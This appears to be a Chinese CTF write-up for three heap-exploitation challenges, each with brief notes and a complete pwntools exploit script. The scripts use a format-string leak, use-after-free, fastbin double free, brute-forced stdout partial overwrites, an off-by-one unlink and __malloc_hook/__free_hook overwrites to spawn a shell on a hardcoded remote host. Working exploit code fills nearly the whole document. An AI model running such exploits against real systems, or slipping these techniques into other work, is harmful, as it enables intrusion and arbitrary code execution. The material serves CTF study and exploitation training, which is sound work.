EASY_ABNORMAL
格式化字符串泄漏libc地址,uaf来泄漏堆地址
利用异常机制将栈迁移到堆上执行gadget
from pwn import *
# Challenge binary and the libc it ships with; symbols are resolved from
# that libc once the base is known.
binary = './pwn'
libc = ELF('./libc-2.23.so')
# One connection, opened at import time; every helper below talks over it.
p = remote('123.56.52.128', '10012')
def name(payload):
    """Answer the ``NAME: `` prompt with ``payload``, sent raw (no newline)."""
    p.recvuntil('NAME: ')
    p.send(payload)
def add(data):
    """Menu option 2: create a note whose content is ``data`` (sent raw)."""
    p.recvuntil('CHOICE :')
    p.sendline('2')
    p.recvuntil('cnt:')
    p.send(data)
def free(index):
    """Menu option 3: free the note at ``index``.

    The writeup relies on the freed note staying readable (UAF), see
    ``show_note``.
    """
    p.recvuntil('CHOICE :')
    p.sendline('3')
    p.recvuntil('idx:')
    p.sendline(str(index))
def show_note():
    """Menu option 4: print the notes (used to read a freed note's contents)."""
    p.recvuntil('CHOICE :')
    p.sendline('4')
def format():
    """Menu option 1: trigger the format-string path (presumably prints the name).

    The name shadows the builtin ``format``; it is kept only because the
    exploit body calls it under this name.
    """
    p.recvuntil('CHOICE :')
    p.sendline('1')
def gift(payload):
    """Hidden menu option 23333: send ``payload`` raw at the ``INPUT:`` prompt."""
    p.recvuntil('CHOICE :')
    p.sendline('23333')
    p.recvuntil('INPUT:')
    p.send(payload)
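# --- 1. leak libc through the format string ------------------------------
# "%11$p" prints the 11th printf argument; on this libc build that is the
# return address into __libc_start_main, 240 bytes past the symbol.
# (The escape sequences in this listing had been stripped; '\n' and '\x00'
# are restored below.)
name("%11$p\n")
format()
p.recvuntil('0x')
main = int(p.recv(12), 16) - 240
libc_base = main - libc.sym['__libc_start_main']
# NOTE(review): one_gadget offsets are specific to one libc build. Re-derive
# with `one_gadget ./libc-2.23.so` and check the gadget's register
# constraints hold at the point it is reached.
one_gadget = libc_base + 0x4527a

# --- 2. leak the heap through the UAF ---------------------------------------
payload = p64(0) * 4 + p64(one_gadget)
add(payload + '\n')
add(payload + '\n')
free(0)
free(1)
show_note()
# The six bytes after 'idx 2:' are a heap pointer (presumably a fastbin fd
# left in the freed note).
p.recvuntil('idx 2:')
heap_addr = u64(p.recv(6).ljust(8, '\x00'))

# --- 3. migrate the stack onto the heap via the exception path ---------------
payload1 = '\x00' * 32 + p64(heap_addr + 0x28)
gift(payload1)
p.interactive()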
maj0rone
仔细分析下这个是不难的,主要在于add功能绕回答一个问题,分析输入80就能绕过了
然后就是简单的uaf,爆破下IO,没给libc,直接用本地的试了一下就通了
from pwn import *
local = 0   # 1 = run ./pwn locally, anything else = connect to the remote
# time: 2020-11-14
# libc: libc-2.23.so
# python version: 2.7
binary = './pwn'
# Local system libc; the remote one was not provided, so this is a guess.
libc_path = '/lib/x86_64-linux-gnu/libc-2.23.so'
port = '18523'
def dbg():
    """Turn on pwntools debug logging and set the terminal it spawns windows in."""
    context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'])
def add(size, content):
    """Menu option 1: allocate ``size`` bytes and fill them with ``content``.

    The menu first asks a question; the writeup found that answering ``80``
    passes that check, so it is sent unconditionally.
    """
    p.recvuntil('>> ')
    p.sendline('1')
    p.recvuntil('please answer the question')
    p.sendline('80')
    p.recvuntil('______?')
    p.sendline(str(size))
    p.recvuntil('start_the_game,yes_or_no?')
    p.send(content)
def edit(index, content):
    """Menu option 4: overwrite the chunk at ``index`` with ``content`` (raw)."""
    p.recvuntil('>> ')
    p.sendline('4')
    p.recvuntil('index ?')
    p.sendline(str(index))
    p.recvuntil('__new_content ?')
    p.send(content)
def free(index):
    """Menu option 2: free the chunk at ``index`` (the pointer stays usable: UAF)."""
    p.recvuntil('>> ')
    p.sendline('2')
    p.recvuntil('index ?')
    p.sendline(str(index))
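def leak_libc(addr):
    """Resolve libc globals from a leaked ``_IO_2_1_stderr_`` address.

    ``addr`` is the runtime address of ``_IO_2_1_stderr_`` (the caller
    derives it from the stdout leak).  Symbols come from ``libc_path``.
    Sets the module globals ``libc_base``, ``__malloc_hook``,
    ``__free_hook``, ``system``, ``binsh_addr`` and ``_IO_2_1_stdout_``
    to absolute addresses.

    NOTE(review): the remote libc was not provided, so ``libc_path`` is the
    local system libc; every address computed here is only as good as that
    guess.
    """
    global libc_base, __malloc_hook, __free_hook, system, binsh_addr, _IO_2_1_stdout_
    libc = ELF(libc_path)
    libc_base = addr - libc.sym['_IO_2_1_stderr_']
    # Single-argument print() behaves the same under Python 2 and 3.
    print("[*] libc base: " + hex(libc_base))
    __malloc_hook = libc_base + libc.sym['__malloc_hook']
    __free_hook = libc_base + libc.sym['__free_hook']
    _IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']
    system = libc_base + libc.sym['system']
    # next() rather than .next(): the method form is Python 2 only.
    binsh_addr = libc_base + next(libc.search('/bin/sh'))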
# Fixed .bss addresses of the binary noted while reversing.
# NOTE(review): none of them is referenced by the exploit below.
byte_bss  = 0x603038
bss1      = 0x60303c
bss2      = 0x603040
yes       = 0x603060
sizearray = 0x603260
heaparray = 0x6032e0
content   = 0x6033e0
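# Retry loop: the two-byte partial overwrite below guesses one ASLR nibble of
# _IO_2_1_stdout_, so roughly one connection in sixteen is expected to work.
# A wrong guess aborts the target and surfaces here as an exception.
# (The '\x..' escapes in this listing had been stripped; restored below.)
p = None
while True:
    try:
        if local == 1:
            p = process(binary)
        else:
            p = remote("123.56.52.128", port)
        # Two 0x70 fastbin chunks (0, 1) plus two small spacers.
        add(0x60, '0')
        add(0x60, '1')
        add(0x10, '2')
        add(0x10, '3')
        # Double free: the 0x70 fastbin becomes 1 -> 0 -> 1.
        free(1)
        free(0)
        free(1)
        # Low byte of chunk 1's fd -> chunk0 + 0x40, where a fake 0x71 size
        # is planted next (fastbin dup into chunk 0).
        edit(1, '\x40')
        payload = p64(0) * 6 + p64(0) + p64(0x71)
        edit(0, payload)
        add(0x60, '4')   # chunk 1
        add(0x60, '5')   # fake chunk at chunk0 + 0x40, overlaps chunk 1's header
        free(1)          # chunk 1 back into the 0x70 fastbin
        # Relabel chunk 1 as 0x91 and free it again: that size is too big
        # for a fastbin, so it lands in the unsorted bin and its fd becomes
        # a libc (main_arena) pointer while the 0x70 fastbin still holds it.
        payload = p64(0) * 5 + p64(0x91)
        edit(5, payload)
        free(1)
        # Restore the size and rewrite the low two bytes of that fd to
        # 0x..65dd: 0x5dd is page-fixed, the '6' nibble is the ASLR guess.
        # 0x..65dd is a fake 0x7f-sized chunk just below _IO_2_1_stdout_.
        payload = p64(0) * 5 + p64(0x71) + '\xdd\x65'
        edit(5, payload)
        # Fake _IO_FILE: flags 0xfbad1800 and a cleared low byte of
        # _IO_write_base, so the next flush writes libc memory to us.
        payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)   # change flags
        payload += p64(0) * 3 + '\x00'                     # make _IO_write_base smaller
        add(0x60, '6')
        add(0x60, '7')   # lands on the fake chunk inside stdout
        edit(7, payload)
        # NOTE(review): recvuntil has no timeout; if nothing is flushed this
        # blocks instead of retrying.
        leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 192
        leak_libc(leak)
        # Fastbin dup into __malloc_hook - 0x23 (the 0x7f "size" trick).
        add(0x60, '8')
        free(8)
        edit(8, p64(__malloc_hook - 0x23))
        # NOTE(review): one_gadget offsets are libc-build specific; re-derive
        # with `one_gadget <libc>` and verify the chosen gadget's constraints.
        one_gadget_list = [0x45226, 0x4527a, 0xf0364, 0xf1207]
        one_gadget = libc_base + one_gadget_list[3]
        payload = 0x13 * 'a' + p64(one_gadget)   # 0x23 - 0x10 header = 0x13 padding
        add(0x60, '9')
        add(0x60, '10')  # the chunk overlapping __malloc_hook
        edit(10, payload)
        p.interactive()
        break
    except Exception as e:
        print(e)
        # p is None when the connection itself failed on this iteration.
        if p is not None:
            p.close()
        continue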
lgtwo
跟De1ctf一个题有点儿像,漏洞是off-by-one
布置堆结构在fastbin的fd上踩出一个unsorted bin指针,爆破IO即可
最后unlink
from pwn import *
local = 0   # 1 = run ./pwn locally, anything else = connect to the remote
binary = './pwn'
# Local system libc; must match the remote build for the offsets to hold.
libc_path = '/lib/x86_64-linux-gnu/libc-2.23.so'
port = '45830'
def dbg():
    """Turn on pwntools debug logging and set the terminal it spawns windows in."""
    context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'])
def add(size, content):
    """Menu option 1: allocate ``size`` bytes and fill them with ``content`` (raw)."""
    p.recvuntil('>>')
    p.sendline('1')
    p.recvuntil('size?')
    p.sendline(str(size))
    p.recvuntil('content?')
    p.send(content)
def free(index):
    """Menu option 2: free the chunk at ``index``."""
    p.recvuntil('>>')
    p.sendline('2')
    p.recvuntil('index ?')
    p.sendline(str(index))
def edit(index, content):
    """Menu option 4: overwrite the chunk at ``index`` with ``content`` (raw).

    Writing one byte past the chunk's usable size is the off-by-one the
    writeup exploits.
    """
    p.recvuntil('>>')
    p.sendline('4')
    p.recvuntil('index ?')
    p.sendline(str(index))
    p.recvuntil('what is your new content ?')
    p.send(content)
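def leak_libc(addr):
    """Resolve libc globals from a leaked ``_IO_2_1_stderr_`` address.

    ``addr`` is the runtime address of ``_IO_2_1_stderr_`` (the caller
    derives it from the stdout leak).  Symbols come from ``libc_path``.
    Sets the module globals ``libc_base``, ``__malloc_hook``,
    ``__free_hook``, ``system``, ``binsh_addr`` and ``_IO_2_1_stdout_``
    to absolute addresses.

    NOTE(review): ``libc_path`` is the local system libc; if the remote
    runs a different build every address computed here is wrong.
    """
    global libc_base, __malloc_hook, __free_hook, system, binsh_addr, _IO_2_1_stdout_
    libc = ELF(libc_path)
    libc_base = addr - libc.sym['_IO_2_1_stderr_']
    # Single-argument print() behaves the same under Python 2 and 3.
    print("[*] libc base: " + hex(libc_base))
    __malloc_hook = libc_base + libc.sym['__malloc_hook']
    __free_hook = libc_base + libc.sym['__free_hook']
    _IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']
    system = libc_base + libc.sym['system']
    # next() rather than .next(): the method form is Python 2 only.
    binsh_addr = libc_base + next(libc.search('/bin/sh'))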
# Fixed .bss addresses of the binary noted while reversing.
heaparray = 0x6020c0   # table of chunk pointers, indexed by menu index
sizearray = 0x602040
some      = 0x602038
content   = 0x6021c0
# Unlink target: heaparray[7]. fd/bk are chosen so that fd->bk and bk->fd
# both resolve to heaparray[7], satisfying glibc's unlink check.
_unlink_target = heaparray + 7 * 8
fd = _unlink_target - 0x18
bk = _unlink_target - 0x10
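# Loaded but not referenced below; handy for interactive symbol lookups.
elf = ELF(binary)
# Retry loop: the two-byte partial overwrite of a fastbin fd guesses one
# ASLR nibble of _IO_2_1_stdout_, so roughly one connection in sixteen
# works; a wrong guess aborts the target and surfaces here as an exception.
# (The '\x..' escapes in this listing had been stripped; restored below.)
p = None
while True:
    try:
        if local == 1:
            p = process(binary)
        else:
            p = remote("123.56.52.128", port)
        add(0x18, 'a')    # 0
        add(0x18, 'b')    # 1
        add(0x60, 'c')    # 2
        add(0x58, 'c')    # 3
        add(0x10, 'pro')  # 4
        # Off-by-one: the 0x19th byte lands on chunk 1's size, making it
        # 0xf0, i.e. chunks 1+2+3 viewed as one.
        edit(0, 0x10 * 'a' + 8 * '\x00' + '\xf1')
        free(1)   # 0xf0 chunk -> unsorted bin
        free(2)   # 0x70 chunk -> fastbin
        # Splitting the unsorted chunk writes unsorted-bin pointers over
        # chunk 2's header, i.e. onto its fastbin fd (now a libc pointer).
        add(0x18, 'heihei')  # 1
        add(0xc0, 'az')      # 2 (the split remainder)
        edit(1, 0x18 * 'a' + '\x71')   # off-by-one: restore chunk 2's size
        edit(0, 0x10 * 'a' + 8 * '\x00' + '\xf1')
        free(1)
        # Chunk 1 now overlaps chunk 2: keep its size 0x71 and rewrite the
        # low two bytes of its fd to 0x..65dd (0x5dd is page-fixed, the '6'
        # nibble is the ASLR guess) -> a fake 0x7f chunk below stdout.
        add(0xe0, 'hello')  # 1
        payload = p64(0) * 3 + p64(0x71) + '\xdd\x65'
        edit(1, payload)
        add(0x60, 'lemon')      # 5: chunk 2
        add(0x60, 'fakechunk')  # 6: inside _IO_2_1_stdout_
        # Fake _IO_FILE: flags 0xfbad1800 and a cleared low byte of
        # _IO_write_base, so the next flush writes libc memory to us.
        payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)   # change flags
        payload += p64(0) * 3 + '\x00'                     # make _IO_write_base smaller
        edit(6, payload)
        # NOTE(review): recvuntil has no timeout; if nothing is flushed this
        # blocks instead of retrying.
        leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 192
        log.success("LEAK:{}".format(hex(leak)))
        leak_libc(leak)
        # Unlink: chunk 7 carries a fake 0x30 chunk whose fd/bk point at
        # heaparray[7]; chunk 8's prev_size/size are set so freeing it
        # consolidates backward, leaving heaparray[7] = &heaparray[4].
        add(0x38, 'a')            # 7
        add(0x80, 'b')            # 8
        add(0x10, '/bin/sh\x00')  # 9
        edit(9, '/bin/sh\x00')
        payload = p64(0) + p64(0x31) + p64(fd) + p64(bk)
        payload = payload.ljust(0x30, '\x00')
        payload += p64(0x30) + '\x90'   # chunk 8: prev_size 0x30, PREV_INUSE cleared
        edit(7, payload)
        free(8)
        # Entry 7 now points into heaparray itself: aim it at __free_hook,
        # then write system through it.
        edit(7, p64(0) * 3 + p64(__free_hook))
        edit(7, p64(system))
        free(9)   # free("/bin/sh") -> system("/bin/sh")
        p.interactive()
        break
    except Exception as e:
        print(e)
        # p is None when the connection itself failed on this iteration.
        if p is not None:
            p.close()
        continue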